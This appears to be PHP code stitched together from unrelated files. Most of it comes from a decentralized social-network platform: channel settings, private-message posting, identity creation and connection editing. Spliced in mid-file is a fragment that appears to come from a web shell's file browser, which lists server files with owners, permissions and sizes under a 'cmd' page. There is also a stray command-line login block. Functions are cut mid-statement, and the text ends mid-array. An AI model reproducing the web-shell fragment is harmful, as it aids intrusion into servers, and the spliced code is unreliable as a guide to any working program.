$post_profilechange = get_pconfig(local_channel(), 'system', 'post_profilechange');
$post_profilechange = $post_profilechange === false ? '0' : $post_profilechange;
// default if not set: 0
$blocktags = get_pconfig(local_channel(), 'system', 'blocktags');
$blocktags = $blocktags === false ? '0' : $blocktags;
$timezone = date_default_timezone_get();
$opt_tpl = get_markup_template("field_checkbox.tpl");
if (get_config('system', 'publish_all')) {
$profile_in_dir = '<input type="hidden" name="profile_in_directory" value="1" />';
} else {
$profile_in_dir = replace_macros($opt_tpl, array('$field' => array('profile_in_directory', t('Publish your default profile in the network directory'), $profile['publish'], '', $yes_no)));
}
$suggestme = replace_macros($opt_tpl, array('$field' => array('suggestme', t('Allow us to suggest you as a potential friend to new members?'), $suggestme, '', $yes_no)));
$subdir = strlen($a->get_path()) ? '<br />' . t('or') . ' ' . $a->get_baseurl(true) . '/channel/' . $nickname : '';
$tpl_addr = get_markup_template("settings_nick_set.tpl");
$prof_addr = replace_macros($tpl_addr, array('$desc' => t('Your channel address is'), '$nickname' => $nickname, '$subdir' => $subdir, '$basepath' => $a->get_hostname()));
$stpl = get_markup_template('settings.tpl');
$acl = new AccessList($channel);
$perm_defaults = $acl->get();
require_once 'include/group.php';
$group_select = mini_group_select(local_channel(), $channel['channel_default_group']);
require_once 'include/menu.php';
$m1 = menu_list(local_channel());
$menu = false;
if ($m1) {
$menu = array();
$current = get_pconfig(local_channel(), 'system', 'channel_menu');
$menu[] = array('name' => '', 'selected' => !$current ? true : false);
foreach ($m1 as $m) {
$menu[] = array('name' => htmlspecialchars($m['menu_name'], ENT_COMPAT, 'UTF-8'), 'selected' => $m['menu_name'] === $current ? ' selected="selected" ' : false);
}
}
$evdays = get_pconfig(local_channel(), 'system', 'evdays');
if (!$evdays) {
$evdays = 3;
}
$permissions_role = get_pconfig(local_channel(), 'system', 'permissions_role');
if (!$permissions_role) {
$permissions_role = 'custom';
}
$permissions_set = $permissions_role != 'custom' ? true : false;
$vnotify = get_pconfig(local_channel(), 'system', 'vnotify');
$always_show_in_notices = get_pconfig(local_channel(), 'system', 'always_show_in_notices');
if ($vnotify === false) {
$vnotify = -1;
}
$o .= replace_macros($stpl, array('$ptitle' => t('Channel Settings'), '$submit' => t('Submit'), '$baseurl' => $a->get_baseurl(true), '$uid' => local_channel(), '$form_security_token' => get_form_security_token("settings"), '$nickname_block' => $prof_addr, '$h_basic' => t('Basic Settings'), '$username' => array('username', t('Full Name:'), $username, ''), '$email' => array('email', t('Email Address:'), $email, ''), '$timezone' => array('timezone_select', t('Your Timezone:'), $timezone, '', get_timezones()), '$defloc' => array('defloc', t('Default Post Location:'), $defloc, t('Geographical location to display on your posts')), '$allowloc' => array('allow_location', t('Use Browser Location:'), get_pconfig(local_channel(), 'system', 'use_browser_location') ? 1 : '', '', $yes_no), '$adult' => array('adult', t('Adult Content'), $adult_flag, t('This channel frequently or regularly publishes adult content. (Please tag any adult material and/or nudity with #NSFW)'), $yes_no), '$h_prv' => t('Security and Privacy Settings'), '$permissions_set' => $permissions_set, '$perms_set_msg' => t('Your permissions are already configured. Click to view/adjust'), '$hide_presence' => array('hide_presence', t('Hide my online presence'), $hide_presence, t('Prevents displaying in your profile that you are online'), $yes_no), '$lbl_pmacro' => t('Simple Privacy Settings:'), '$pmacro3' => t('Very Public - <em>extremely permissive (should be used with caution)</em>'), '$pmacro2' => t('Typical - <em>default public, privacy when desired (similar to social network permissions but with improved privacy)</em>'), '$pmacro1' => t('Private - <em>default private, never open or public</em>'), '$pmacro0' => t('Blocked - <em>default blocked to/from everybody</em>'), '$permiss_arr' => $permiss, '$blocktags' => array('blocktags', t('Allow others to tag your posts'), 1 - $blocktags, t('Often used by the community to retro-actively flag inappropriate content'), $yes_no), '$lbl_p2macro' => t('Advanced Privacy Settings'), '$expire' => array('expire', t('Expire other channel content after this many days'), $expire, sprintf(t('0 or blank to use the website limit. The website expires after %d days.'), intval($sys_expire))), '$maxreq' => array('maxreq', t('Maximum Friend Requests/Day:'), intval($channel['channel_max_friend_req']), t('May reduce spam activity')), '$permissions' => t('Default Post Permissions'), '$permdesc' => t("(click to open/close)"), '$aclselect' => populate_acl($perm_defaults, false), '$suggestme' => $suggestme, '$group_select' => $group_select, '$role' => array('permissions_role', t('Channel permissions category:'), $permissions_role, '', get_roles()), '$profile_in_dir' => $profile_in_dir, '$hide_friends' => $hide_friends, '$hide_wall' => $hide_wall, '$unkmail' => $unkmail, '$cntunkmail' => array('cntunkmail', t('Maximum private messages per day from unknown people:'), intval($channel['channel_max_anon_mail']), t("Useful to reduce spamming")), '$h_not' => t('Notification Settings'), '$activity_options' => t('By default post a status message when:'), '$post_newfriend' => array('post_newfriend', t('accepting a friend request'), $post_newfriend, '', $yes_no), '$post_joingroup' => array('post_joingroup', t('joining a forum/community'), $post_joingroup, '', $yes_no), '$post_profilechange' => array('post_profilechange', t('making an <em>interesting</em> profile change'), $post_profilechange, '', $yes_no), '$lbl_not' => t('Send a notification email when:'), '$notify1' => array('notify1', t('You receive a connection request'), $notify & NOTIFY_INTRO, NOTIFY_INTRO, '', $yes_no), '$notify2' => array('notify2', t('Your connections are confirmed'), $notify & NOTIFY_CONFIRM, NOTIFY_CONFIRM, '', $yes_no), '$notify3' => array('notify3', t('Someone writes on your profile wall'), $notify & NOTIFY_WALL, NOTIFY_WALL, '', $yes_no), '$notify4' => array('notify4', t('Someone writes a followup comment'), $notify & NOTIFY_COMMENT, NOTIFY_COMMENT, '', $yes_no), '$notify5' => array('notify5', t('You receive a private message'), $notify & NOTIFY_MAIL, NOTIFY_MAIL, '', $yes_no), '$notify6' => array('notify6', t('You receive a friend suggestion'), $notify & NOTIFY_SUGGEST, NOTIFY_SUGGEST, '', $yes_no), '$notify7' => array('notify7', t('You are tagged in a post'), $notify & NOTIFY_TAGSELF, NOTIFY_TAGSELF, '', $yes_no), '$notify8' => array('notify8', t('You are poked/prodded/etc. in a post'), $notify & NOTIFY_POKE, NOTIFY_POKE, '', $yes_no), '$lbl_vnot' => t('Show visual notifications including:'), '$vnotify1' => array('vnotify1', t('Unseen grid activity'), $vnotify & VNOTIFY_NETWORK, VNOTIFY_NETWORK, '', $yes_no), '$vnotify2' => array('vnotify2', t('Unseen channel activity'), $vnotify & VNOTIFY_CHANNEL, VNOTIFY_CHANNEL, '', $yes_no), '$vnotify3' => array('vnotify3', t('Unseen private messages'), $vnotify & VNOTIFY_MAIL, VNOTIFY_MAIL, t('Recommended'), $yes_no), '$vnotify4' => array('vnotify4', t('Upcoming events'), $vnotify & VNOTIFY_EVENT, VNOTIFY_EVENT, '', $yes_no), '$vnotify5' => array('vnotify5', t('Events today'), $vnotify & VNOTIFY_EVENTTODAY, VNOTIFY_EVENTTODAY, '', $yes_no), '$vnotify6' => array('vnotify6', t('Upcoming birthdays'), $vnotify & VNOTIFY_BIRTHDAY, VNOTIFY_BIRTHDAY, t('Not available in all themes'), $yes_no), '$vnotify7' => array('vnotify7', t('System (personal) notifications'), $vnotify & VNOTIFY_SYSTEM, VNOTIFY_SYSTEM, '', $yes_no), '$vnotify8' => array('vnotify8', t('System info messages'), $vnotify & VNOTIFY_INFO, VNOTIFY_INFO, t('Recommended'), $yes_no), '$vnotify9' => array('vnotify9', t('System critical alerts'), $vnotify & VNOTIFY_ALERT, VNOTIFY_ALERT, t('Recommended'), $yes_no), '$vnotify10' => array('vnotify10', t('New connections'), $vnotify & VNOTIFY_INTRO, VNOTIFY_INTRO, t('Recommended'), $yes_no), '$vnotify11' => array('vnotify11', t('System Registrations'), $vnotify & VNOTIFY_REGISTER, VNOTIFY_REGISTER, '', $yes_no), '$always_show_in_notices' => array('always_show_in_notices', t('Also show new wall posts, private messages and connections under Notices'), $always_show_in_notices, 1, '', $yes_no), '$evdays' => array('evdays', t('Notify me of events this many days in advance'), $evdays, t('Must be greater than 0')), '$h_advn' => t('Advanced Account/Page Type Settings'), '$h_descadvn' => t('Change the behaviour of this account for special situations'), '$pagetype' => $pagetype, '$expert' => feature_enabled(local_channel(), 'expert'), '$hint' => t('Please enable expert mode (in <a href="settings/features">Settings > Additional features</a>) to adjust!'), '$lbl_misc' => t('Miscellaneous Settings'), '$photo_path' => array('photo_path', t('Default photo upload folder'), get_pconfig(local_channel(), 'system', 'photo_path'), t('%Y - current year, %m - current month')), '$attach_path' => array('attach_path', t('Default file upload folder'), get_pconfig(local_channel(), 'system', 'attach_path'), t('%Y - current year, %m - current month')), '$menus' => $menu, '$menu_desc' => t('Personal menu to display in your channel pages'), '$removeme' => t('Remove Channel'), '$removechannel' => t('Remove this channel.'), '$firefoxshare' => t('Firefox Share $Projectname provider'), '$cal_first_day' => array('first_day', t('Start calendar week on monday'), get_pconfig(local_channel(), 'system', 'cal_first_day') ? 1 : '', '', $yes_no)));
call_hooks('settings_form', $o);
$o .= '</form>' . "\r\n";
return $o;
}
}
function mail_post(&$a)
{
if (!local_user()) {
return;
}
$replyto = x($_REQUEST, 'replyto') ? notags(trim($_REQUEST['replyto'])) : '';
$subject = x($_REQUEST, 'subject') ? notags(trim($_REQUEST['subject'])) : '';
$body = x($_REQUEST, 'body') ? escape_tags(trim($_REQUEST['body'])) : '';
$recipient = x($_REQUEST, 'messageto') ? notags(trim($_REQUEST['messageto'])) : '';
$rstr = x($_REQUEST, 'messagerecip') ? notags(trim($_REQUEST['messagerecip'])) : '';
$expires = x($_REQUEST, 'expires') ? datetime_convert(date_default_timezone_get(), 'UTC', $_REQUEST['expires']) : NULL_DATE;
// If we have a raw string for a recipient which hasn't been auto-filled,
// it means they probably aren't in our address book, hence we don't know
// if we have permission to send them private messages.
// finger them and find out before we try and send it.
if (!$recipient) {
$channel = $a->get_channel();
$ret = zot_finger($rstr, $channel);
if (!$ret['success']) {
notice(t('Unable to lookup recipient.') . EOL);
return;
}
$j = json_decode($ret['body'], true);
logger('message_post: lookup: ' . $url . ' ' . print_r($j, true));
if (!($j['success'] && $j['guid'])) {
notice(t('Unable to communicate with requested channel.'));
return;
}
$x = import_xchan($j);
if (!$x['success']) {
notice(t('Cannot verify requested channel.'));
return;
}
$recipient = $x['hash'];
$their_perms = 0;
$global_perms = get_perms();
if ($j['permissions']['data']) {
$permissions = crypto_unencapsulate($j['permissions'], $channel['channel_prvkey']);
if ($permissions) {
$permissions = json_decode($permissions);
}
logger('decrypted permissions: ' . print_r($permissions, true), LOGGER_DATA);
} else {
$permissions = $j['permissions'];
}
foreach ($permissions as $k => $v) {
if ($v) {
$their_perms = $their_perms | intval($global_perms[$k][1]);
}
}
if (!($their_perms & PERMS_W_MAIL)) {
notice(t('Selected channel has private message restrictions. Send failed.'));
return;
}
}
// if(feature_enabled(local_user(),'richtext')) {
// $body = fix_mce_lf($body);
// }
if (!$recipient) {
notice('No recipient found.');
$a->argc = 2;
$a->argv[1] = 'new';
return;
}
// We have a local_user, let send_message use the session channel and save a lookup
$ret = send_message(0, $recipient, $body, $subject, $replyto, $expires);
if (!$ret['success']) {
notice($ret['message']);
}
goaway(z_root() . '/message');
}
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
else {$not_dirs[]=$fn;}
}
for($i=0;$i<sizeof($not_dirs);$i++)
{
$fn=$not_dirs[$i];
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','"',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
echo('</pre><hr>');
?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120><br>
<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?
} else echo('Error Listing '.$e_work_dir);
}
else
switch($f_action)
// Start out the session as a guest with level 0 access. This is for view only mode.
// You can enable or disable this by setting the "disable_guest" sysconfig option
if ($_SERVER['PHP_AUTH_USER'] == '' and !$conf['disable_guest']) {
$_SESSION['ona']['auth']['user']['username'] = '******';
// create new local authentication class directly
$auth = load_auth_class('local');
get_perms('dcm.pl');
printmsg("INFO => [{$type}] {$_SESSION['ona']['auth']['user']['username']} has logged in", 3);
} else {
// Set the cli user as the login user
$DCMUSER = $_SESSION['ona']['auth']['user']['username'] = $_SERVER['PHP_AUTH_USER'];
printmsg("INFO => [{$type}] Attempting login as " . $DCMUSER, 4);
list($status, $js) = get_authentication($DCMUSER, $_SERVER['PHP_AUTH_PW']);
$errmsg = substr($js, 27);
if ($status == 0) {
$PERMSTAT = get_perms($DCMUSER);
printmsg("INFO => [{$type}] {$_SESSION['ona']['auth']['user']['username']} has logged in", 3);
} else {
printmsg("ERROR => DCM: Unknown user {$DCMUSER}", 4);
print "ERROR => [{$DCMUSER}]: {$errmsg}\nSee -l and -p options within dcm.pl.\n";
// clear the session
// FIXME: should I do a sess_destroy or sess_close instead? to clear crap from the DB
unset($_SESSION['ona']['auth']);
exit;
}
}
// Display the current debug level if it's above 1
printmsg("DEBUG => debug level: {$conf['debug']}", 1);
/* ----------- RUN A MODULE IF NEEDED ------------ */
if (isset($_REQUEST['module'])) {
// Run the module
/**
* @function create_identity($arr)
* Create a new channel
* Also creates the related xchan, hubloc, profile, and "self" abook records, and an
* empty "Friends" group/collection for the new channel
*
* @param array $arr
* 'name' => full name of channel
* 'nickname' => "email/url-compliant" nickname
* 'account_id' => account_id to attach with this channel
* [other identity fields as desired]
*
* @returns array
* 'success' => boolean true or false
* 'message' => optional error text if success is false
* 'channel' => if successful the created channel array
*/
function create_identity($arr)
{
$a = get_app();
$ret = array('success' => false);
if (!$arr['account_id']) {
$ret['message'] = t('No account identifier');
return $ret;
}
$ret = identity_check_service_class($arr['account_id']);
if (!$ret['success']) {
return $ret;
}
$nick = mb_strtolower(trim($arr['nickname']));
if (!$nick) {
$ret['message'] = t('Nickname is required.');
return $ret;
}
$name = escape_tags($arr['name']);
$pageflags = x($arr, 'pageflags') ? intval($arr['pageflags']) : PAGE_NORMAL;
$xchanflags = x($arr, 'xchanflags') ? intval($arr['xchanflags']) : XCHAN_FLAGS_NORMAL;
$name_error = validate_channelname($arr['name']);
if ($name_error) {
$ret['message'] = $name_error;
return $ret;
}
if ($nick === 'sys' && !($pageflags & PAGE_SYSTEM)) {
$ret['message'] = t('Reserved nickname. Please choose another.');
return $ret;
}
if (check_webbie(array($nick)) !== $nick) {
$ret['message'] = t('Nickname has unsupported characters or is already being used on this site.');
return $ret;
}
$guid = zot_new_uid($nick);
$key = new_keypair(4096);
$sig = base64url_encode(rsa_sign($guid, $key['prvkey']));
$hash = make_xchan_hash($guid, $sig);
// Force a few things on the short term until we can provide a theme or app with choice
$publish = 1;
if (array_key_exists('publish', $arr)) {
$publish = intval($arr['publish']);
}
$primary = true;
if (array_key_exists('primary', $arr)) {
$primary = intval($arr['primary']);
}
$perms_sql = '';
$defperms = site_default_perms();
$global_perms = get_perms();
foreach ($defperms as $p => $v) {
$perms_keys .= ', ' . $global_perms[$p][0];
$perms_vals .= ', ' . intval($v);
}
$expire = get_config('system', 'default_expire_days');
$expire = $expire === false ? '0' : $expire;
$r = q("insert into channel ( channel_account_id, channel_primary, \n\t\tchannel_name, channel_address, channel_guid, channel_guid_sig,\n\t\tchannel_hash, channel_prvkey, channel_pubkey, channel_pageflags, channel_expire_days {$perms_keys} )\n\t\tvalues ( %d, %d, '%s', '%s', '%s', '%s', '%s', '%s', '%s', %d, %d {$perms_vals} ) ", intval($arr['account_id']), intval($primary), dbesc($name), dbesc($nick), dbesc($guid), dbesc($sig), dbesc($hash), dbesc($key['prvkey']), dbesc($key['pubkey']), intval($pageflags), intval($expire));
$r = q("select * from channel where channel_account_id = %d \n\t\tand channel_guid = '%s' limit 1", intval($arr['account_id']), dbesc($guid));
if (!$r) {
$ret['message'] = t('Unable to retrieve created identity');
return $ret;
}
$ret['channel'] = $r[0];
if (intval($arr['account_id'])) {
set_default_login_identity($arr['account_id'], $ret['channel']['channel_id'], false);
}
// Create a verified hub location pointing to this site.
$r = q("insert into hubloc ( hubloc_guid, hubloc_guid_sig, hubloc_hash, hubloc_addr, hubloc_flags, \n\t\thubloc_url, hubloc_url_sig, hubloc_host, hubloc_callback, hubloc_sitekey )\n\t\tvalues ( '%s', '%s', '%s', '%s', %d, '%s', '%s', '%s', '%s', '%s' )", dbesc($guid), dbesc($sig), dbesc($hash), dbesc($ret['channel']['channel_address'] . '@' . get_app()->get_hostname()), intval($primary ? HUBLOC_FLAGS_PRIMARY : 0), dbesc(z_root()), dbesc(base64url_encode(rsa_sign(z_root(), $ret['channel']['channel_prvkey']))), dbesc(get_app()->get_hostname()), dbesc(z_root() . '/post'), dbesc(get_config('system', 'pubkey')));
if (!$r) {
logger('create_identity: Unable to store hub location');
}
$newuid = $ret['channel']['channel_id'];
$r = q("insert into xchan ( xchan_hash, xchan_guid, xchan_guid_sig, xchan_pubkey, xchan_photo_l, xchan_photo_m, xchan_photo_s, xchan_addr, xchan_url, xchan_follow, xchan_connurl, xchan_name, xchan_network, xchan_photo_date, xchan_name_date, xchan_flags ) values ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', %d)", dbesc($hash), dbesc($guid), dbesc($sig), dbesc($key['pubkey']), dbesc($a->get_baseurl() . "/photo/profile/l/{$newuid}"), dbesc($a->get_baseurl() . "/photo/profile/m/{$newuid}"), dbesc($a->get_baseurl() . "/photo/profile/s/{$newuid}"), dbesc($ret['channel']['channel_address'] . '@' . get_app()->get_hostname()), dbesc(z_root() . '/channel/' . $ret['channel']['channel_address']), dbesc(z_root() . '/follow?f=&url=%s'), dbesc(z_root() . '/poco/' . $ret['channel']['channel_address']), dbesc($ret['channel']['channel_name']), dbesc('zot'), dbesc(datetime_convert()), dbesc(datetime_convert()), intval($xchanflags));
// Not checking return value.
// It's ok for this to fail if it's an imported channel, and therefore the hash is a duplicate
$r = q("INSERT INTO profile ( aid, uid, profile_guid, profile_name, is_default, publish, name, photo, thumb)\n\t\tVALUES ( %d, %d, '%s', '%s', %d, %d, '%s', '%s', '%s') ", intval($ret['channel']['channel_account_id']), intval($newuid), dbesc(random_string()), t('Default Profile'), 1, $publish, dbesc($ret['channel']['channel_name']), dbesc($a->get_baseurl() . "/photo/profile/l/{$newuid}"), dbesc($a->get_baseurl() . "/photo/profile/m/{$newuid}"));
$r = q("insert into abook ( abook_account, abook_channel, abook_xchan, abook_closeness, abook_created, abook_updated, abook_flags )\n\t\tvalues ( %d, %d, '%s', %d, '%s', '%s', %d ) ", intval($ret['channel']['channel_account_id']), intval($newuid), dbesc($hash), intval(0), dbesc(datetime_convert()), dbesc(datetime_convert()), intval(ABOOK_FLAG_SELF));
if (intval($ret['channel']['channel_account_id'])) {
// Create a group with no members. This allows somebody to use it
// right away as a default group for new contacts.
require_once 'include/group.php';
group_add($newuid, t('Friends'));
call_hooks('register_account', $newuid);
proc_run('php', 'include/directory.php', $ret['channel']['channel_id']);
}
$ret['success'] = true;
return $ret;
}
function connedit_content(&$a)
{
$sort_type = 0;
$o = '';
if (!local_channel()) {
notice(t('Permission denied.') . EOL);
return login();
}
$channel = $a->get_channel();
$my_perms = get_channel_default_perms(local_channel());
$role = get_pconfig(local_channel(), 'system', 'permissions_role');
if ($role) {
$x = get_role_perms($role);
if ($x['perms_accept']) {
$my_perms = $x['perms_accept'];
}
}
if ($my_perms) {
$o .= "<script>function connectDefaultShare() {\n\t\t\$('.abook-edit-me').each(function() {\n\t\t\tif(! \$(this).is(':disabled'))\n\t\t\t\t\$(this).removeAttr('checked');\n\t\t});\n\n";
$perms = get_perms();
foreach ($perms as $p => $v) {
if ($my_perms & $v[1]) {
$o .= "\$('#me_id_perms_" . $p . "').attr('checked','checked'); \n";
}
}
$o .= " }\n</script>\n";
}
if (argc() == 3) {
$contact_id = intval(argv(1));
if (!$contact_id) {
return;
}
$cmd = argv(2);
$orig_record = q("SELECT abook.*, xchan.* FROM abook left join xchan on abook_xchan = xchan_hash\n\t\t\tWHERE abook_id = %d AND abook_channel = %d AND NOT ( abook_flags & %d )>0 LIMIT 1", intval($contact_id), intval(local_channel()), intval(ABOOK_FLAG_SELF));
if (!count($orig_record)) {
notice(t('Could not access address book record.') . EOL);
goaway($a->get_baseurl(true) . '/connections');
}
if ($cmd === 'update') {
// pull feed and consume it, which should subscribe to the hub.
proc_run('php', "include/poller.php", "{$contact_id}");
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'refresh') {
if (!zot_refresh($orig_record[0], get_app()->get_channel())) {
notice(t('Refresh failed - channel is currently unavailable.'));
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'block') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_BLOCKED)) {
info(($orig_record[0]['abook_flags'] & ABOOK_FLAG_BLOCKED ? t('Channel has been unblocked') : t('Channel has been blocked')) . EOL);
connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'ignore') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_IGNORED)) {
info(($orig_record[0]['abook_flags'] & ABOOK_FLAG_IGNORED ? t('Channel has been unignored') : t('Channel has been ignored')) . EOL);
connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'archive') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_ARCHIVED)) {
info(($orig_record[0]['abook_flags'] & ABOOK_FLAG_ARCHIVED ? t('Channel has been unarchived') : t('Channel has been archived')) . EOL);
connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'hide') {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_HIDDEN)) {
info(($orig_record[0]['abook_flags'] & ABOOK_FLAG_HIDDEN ? t('Channel has been unhidden') : t('Channel has been hidden')) . EOL);
connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
// We'll prevent somebody from unapproving an already approved contact.
// Though maybe somebody will want this eventually (??)
if ($cmd === 'approve') {
if ($orig_record[0]['abook_flags'] & ABOOK_FLAG_PENDING) {
if (abook_toggle_flag($orig_record[0], ABOOK_FLAG_PENDING)) {
info(($orig_record[0]['abook_flags'] & ABOOK_FLAG_PENDING ? t('Channel has been approved') : t('Channel has been unapproved')) . EOL);
connedit_clone($a);
} else {
notice(t('Unable to set address book parameters.') . EOL);
}
}
goaway($a->get_baseurl(true) . '/connedit/' . $contact_id);
}
if ($cmd === 'drop') {
require_once 'include/Contact.php';
// FIXME
// We need to send either a purge or a refresh packet to the other side (the channel being unfriended).
// The issue is that the abook DB record _may_ get destroyed when we call contact_remove. As the notifier runs
// in the background there could be a race condition preventing this packet from being sent in all cases.
// PLACEHOLDER
contact_remove(local_channel(), $orig_record[0]['abook_id']);
build_sync_packet(0, array('abook' => array(array('abook_xchan' => $orig_record[0]['abook_xchan'], 'entry_deleted' => true))));
info(t('Connection has been removed.') . EOL);
if (x($_SESSION, 'return_url')) {
goaway($a->get_baseurl(true) . '/' . $_SESSION['return_url']);
}
goaway($a->get_baseurl(true) . '/contacts');
}
}
if ($a->poi) {
$contact_id = $a->poi['abook_id'];
$contact = $a->poi;
$tabs = array(array('label' => t('View Profile'), 'url' => chanlink_cid($contact['abook_id']), 'sel' => '', 'title' => sprintf(t('View %s\'s profile'), $contact['xchan_name'])), array('label' => t('Refresh Permissions'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/refresh', 'sel' => '', 'title' => t('Fetch updated permissions')), array('label' => t('Recent Activity'), 'url' => $a->get_baseurl(true) . '/network/?f=&cid=' . $contact['abook_id'], 'sel' => '', 'title' => t('View recent posts and comments')));
$buttons = array(array('label' => $contact['abook_flags'] & ABOOK_FLAG_BLOCKED ? t('Unblock') : t('Block'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/block', 'sel' => $contact['abook_flags'] & ABOOK_FLAG_BLOCKED ? 'active' : '', 'title' => t('Block (or Unblock) all communications with this connection')), array('label' => $contact['abook_flags'] & ABOOK_FLAG_IGNORED ? t('Unignore') : t('Ignore'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/ignore', 'sel' => $contact['abook_flags'] & ABOOK_FLAG_IGNORED ? 'active' : '', 'title' => t('Ignore (or Unignore) all inbound communications from this connection')), array('label' => $contact['abook_flags'] & ABOOK_FLAG_ARCHIVED ? t('Unarchive') : t('Archive'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/archive', 'sel' => $contact['abook_flags'] & ABOOK_FLAG_ARCHIVED ? 'active' : '', 'title' => t('Archive (or Unarchive) this connection - mark channel dead but keep content')), array('label' => $contact['abook_flags'] & ABOOK_FLAG_HIDDEN ? t('Unhide') : t('Hide'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/hide', 'sel' => $contact['abook_flags'] & ABOOK_FLAG_HIDDEN ? 'active' : '', 'title' => t('Hide or Unhide this connection from your other connections')), array('label' => t('Delete'), 'url' => $a->get_baseurl(true) . '/connedit/' . $contact['abook_id'] . '/drop', 'sel' => '', 'title' => t('Delete this connection')));
$self = false;
if (!($contact['abook_flags'] & ABOOK_FLAG_SELF)) {
$tab_tpl = get_markup_template('common_tabs.tpl');
$t = replace_macros($tab_tpl, array('$tabs' => $tabs));
} else {
$self = true;
}
$a->page['htmlhead'] .= replace_macros(get_markup_template('contact_head.tpl'), array('$baseurl' => $a->get_baseurl(true), '$editselect' => $editselect));
require_once 'include/contact_selectors.php';
$tpl = get_markup_template("abook_edit.tpl");
if (feature_enabled(local_channel(), 'affinity')) {
$slider_tpl = get_markup_template('contact_slider.tpl');
$slide = replace_macros($slider_tpl, array('$me' => t('Me'), '$min' => 1, '$val' => $contact['abook_closeness'] ? $contact['abook_closeness'] : 99, '$intimate' => t('Best Friends'), '$friends' => t('Friends'), '$oldfriends' => t('Former Friends'), '$acquaintances' => t('Acquaintances'), '$world' => t('Unknown')));
}
$rating_val = 0;
$rating_text = '';
$xl = q("select * from xlink where xlink_xchan = '%s' and xlink_link = '%s' and xlink_static = 1", dbesc($channel['channel_hash']), dbesc($contact['xchan_hash']));
if ($xl) {
$rating_val = intval($xl[0]['xlink_rating']);
$rating_text = $xl[0]['xlink_rating_text'];
}
$poco_rating = get_config('system', 'poco_rating_enable');
// if unset default to enabled
if ($poco_rating === false) {
$poco_rating = true;
}
if ($poco_rating) {
$rating = replace_macros(get_markup_template('rating_slider.tpl'), array('$min' => -10, '$val' => $rating_val));
} else {
$rating = false;
}
$perms = array();
$channel = $a->get_channel();
$global_perms = get_perms();
$existing = get_all_perms(local_channel(), $contact['abook_xchan']);
$unapproved = array('pending', t('Approve this connection'), '', t('Accept connection to allow communication'));
foreach ($global_perms as $k => $v) {
$thisperm = $contact['abook_my_perms'] & $v[1] ? "1" : '';
// For auto permissions (when $self is true) we don't want to look at existing
// permissions because they are enabled for the channel owner
if (!$self && $existing[$k]) {
$thisperm = "1";
}
$perms[] = array('perms_' . $k, $v[3], $contact['abook_their_perms'] & $v[1] ? "1" : "", $thisperm, $v[1], $channel[$v[0]] == PERMS_SPECIFIC || $self ? '' : '1', $v[4]);
}
$o .= replace_macros($tpl, array('$header' => $self ? t('Connection Default Permissions') : sprintf(t('Connections: settings for %s'), $contact['xchan_name']), '$autoperms' => array('autoperms', t('Apply these permissions automatically'), get_pconfig(local_channel(), 'system', 'autoperms') ? 1 : 0, ''), '$addr' => $contact['xchan_addr'], '$notself' => $self ? '' : '1', '$self' => $self ? '1' : '', '$autolbl' => t('Apply the permissions indicated on this page to all new connections.'), '$buttons' => $self ? '' : $buttons, '$viewprof' => t('View Profile'), '$clickme' => t('Click to open/close'), '$lbl_slider' => t('Slide to adjust your degree of friendship'), '$lbl_rating' => t('Rating (this information is public)'), '$lbl_rating_txt' => t('Optionally explain your rating (this information is public)'), '$rating_txt' => $rating_text, '$rating' => $rating, '$rating_val' => $rating_val, '$slide' => $slide, '$tabs' => $t, '$tab_str' => $tab_str, '$perms_step1' => t('Default permissions for your channel type have (just) been applied. They have not yet been submitted. Please review the permissions on this page and make any desired changes at this time. This new connection may <em>not</em> be able to communicate with you until you submit this page, which will install and apply the selected permissions.'), '$is_pending' => $contact['abook_flags'] & ABOOK_FLAG_PENDING ? 1 : '', '$unapproved' => $unapproved, '$inherited' => t('inherited'), '$approve' => t('Approve this connection'), '$noperms' => $contact['abook_my_perms'] ? false : true, '$no_perms' => !$self && !$contact['abook_my_perms'] ? t('Connection has no individual permissions!') : '', '$noperm_desc' => !$self && !$contact['abook_my_perms'] ? t('This may be appropriate based on your <a href="settings">privacy settings</a>, though you may wish to review the "Advanced Permissions".') : '', '$submit' => t('Submit'), '$lbl_vis1' => t('Profile Visibility'), '$lbl_vis2' => sprintf(t('Please choose the profile you would like to display to %s when viewing your profile securely.'), $contact['xchan_name']), '$lbl_info1' => t('Contact Information / Notes'), '$infedit' => 